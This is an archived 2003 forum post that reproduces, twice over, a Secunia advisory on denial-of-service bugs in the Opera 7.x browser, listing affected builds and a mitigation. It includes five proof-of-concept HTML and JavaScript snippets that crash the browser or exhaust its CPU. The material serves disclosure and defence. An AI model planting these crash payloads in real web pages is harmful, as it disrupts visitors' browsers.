Opera Dos Danger
Posted: Tue Jul 01, 2003 10:29 pm
http://www.secunia.com/advisories/9156/ 
elease Date: 2003-07-01
Critical: Not critical
Impact: DoS
Where: From remote
Software: Opera 7.x
Description:
Multiple DoS (Denial of Service) issues have been reported in the Opera browser.
A malicious person can exploit these to either crash the browser due to some NULL pointer dereference bugs or in some cases make it consume vast amounts of CPU resources.
The following five examples was provided in the original advisory:
#1
<!DOCTYPE[NULL byte]A>
#2
<form></form><script>document.forms[0].submit()</script>
#3
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
#4
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
#5
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
The issues have been reported in the following versions for Windows:
7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670
However, Secunia has also been able to confirm the issues in version 7.11 for Linux. Prior versions may also be affected.
Solution:
If regarded as a security threat, all issues except #1 can be eliminated by disabling JavaScript support and the setting "Author mode by default".
Reported by / credits:
imagine and nesumin, :: Operash ::
Archived topic from Iceteks, old topic ID:1033, old post ID:8967
elease Date: 2003-07-01
Critical: Not critical
Impact: DoS
Where: From remote
Software: Opera 7.x
Description:
Multiple DoS (Denial of Service) issues have been reported in the Opera browser.
A malicious person can exploit these to either crash the browser due to some NULL pointer dereference bugs or in some cases make it consume vast amounts of CPU resources.
The following five examples was provided in the original advisory:
#1
<!DOCTYPE[NULL byte]A>
#2
<form></form><script>document.forms[0].submit()</script>
#3
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
#4
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
#5
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
The issues have been reported in the following versions for Windows:
7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670
However, Secunia has also been able to confirm the issues in version 7.11 for Linux. Prior versions may also be affected.
Solution:
If regarded as a security threat, all issues except #1 can be eliminated by disabling JavaScript support and the setting "Author mode by default".
Reported by / credits:
imagine and nesumin, :: Operash ::
Archived topic from Iceteks, old topic ID:1033, old post ID:8967
